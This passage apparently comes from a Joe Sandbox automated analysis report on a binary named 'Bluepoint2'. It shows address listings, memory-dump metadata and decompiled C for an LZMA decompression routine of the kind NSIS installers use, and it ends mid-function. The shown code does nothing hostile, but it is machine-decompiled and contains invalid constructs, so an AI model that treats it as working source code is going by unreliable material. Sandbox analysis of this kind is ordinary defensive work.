                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00407447
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00407120

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
